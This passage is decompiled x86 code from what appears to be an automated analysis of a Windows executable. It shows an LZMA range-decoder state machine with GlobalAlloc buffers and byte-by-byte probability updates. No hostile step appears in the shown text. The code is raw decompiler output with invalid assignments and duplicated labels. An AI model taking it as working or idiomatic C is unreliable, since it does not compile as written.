									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
